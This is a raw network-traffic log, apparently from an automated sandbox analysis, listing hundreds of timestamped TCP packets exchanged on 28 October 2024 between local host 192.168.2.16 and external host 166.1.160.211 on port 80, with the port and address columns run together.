                                                                                                                                                              Oct 28, 2024 19:46:20.439654112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.439666986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.439687014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.439719915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.439732075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.473757982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.475514889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.475569010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.475575924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.475603104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.475656033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.475789070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.475822926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.475857019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.475867987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.476052046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.476084948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.476104021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.476119041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.476151943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.476166010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.476183891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.476212025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.476227999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.476247072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.476295948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.476471901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482229948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482281923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.482331991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482367039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482400894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482415915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.482510090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482553959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.482599974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482634068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482667923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482676983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.482733011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482777119 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.482844114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482878923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482932091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.482932091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.482965946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483000040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483014107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483056068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483103991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483351946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483392954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483428001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483443975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483464003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483495951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483510017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483529091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483580112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483599901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483633041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483669043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483679056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483701944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483735085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483746052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483769894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483803988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483818054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483839035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483872890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483886003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.483906031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.483947992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.484513044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484545946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484580040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484596968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.484612942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484646082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484663010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.484679937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484714031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484729052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.484746933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484780073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484791040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.484808922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484843016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484858036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.484877110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484910011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484920979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.484945059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.484992027 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.485287905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485321999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485354900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485371113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.485421896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485455036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485469103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.485488892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485534906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485543966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.485569954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485604048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485615015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.485637903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485671997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485687971 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.485708952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485743046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.485759974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.485824108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486371040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486404896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486422062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486437082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486470938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486478090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486504078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486536980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486551046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486569881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486603975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486619949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486635923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486670017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486685038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486704111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486738920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486752987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486769915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486803055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486819029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.486838102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.486887932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487262011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487297058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487344980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487346888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487380981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487415075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487426996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487448931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487481117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487498045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487515926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487548113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487566948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487582922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487615108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487623930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487648964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487677097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487689972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.487709999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.487761021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488238096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488274097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488306999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488318920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488341093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488373041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488384962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488406897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488440037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488456964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488473892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488507032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488522053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488542080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488574982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488591909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488607883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488641977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488661051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.488676071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.488720894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489104033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489156008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489202023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489204884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489240885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489274025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489289045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489310026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489341974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489356041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489377022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489408970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489424944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489444971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489476919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489490032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489510059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489543915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489562988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.489578962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489607096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.489626884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490041018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490073919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490098000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490107059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490142107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490155935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490178108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490211964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490226984 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.490247011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490279913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.490294933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.536950111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537003994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537034035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537069082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537112951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537166119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537199974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537233114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537250996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537267923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537301064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537313938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537412882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537456036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537499905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537544966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537587881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537596941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537650108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537694931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537702084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537738085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537781000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537807941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537841082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.537883997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.537998915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538033962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538067102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538079977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538100958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538134098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538149118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538167000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538202047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538213968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538520098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538553953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538567066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538587093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538619041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538633108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538654089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538686037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538693905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538718939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538752079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538762093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.538788080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.538832903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539060116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539089918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539123058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539132118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539158106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539191008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539210081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539225101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539258957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539269924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539292097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539344072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539347887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539381981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539417982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539431095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539453030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539486885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539504051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.539520979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.539570093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540033102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540085077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540118933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540132046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540153027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540185928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540204048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540220022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540251970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540266037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540287018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540318966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540344954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540353060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540385962 CET8049726166.1.160.211192.168.2.16
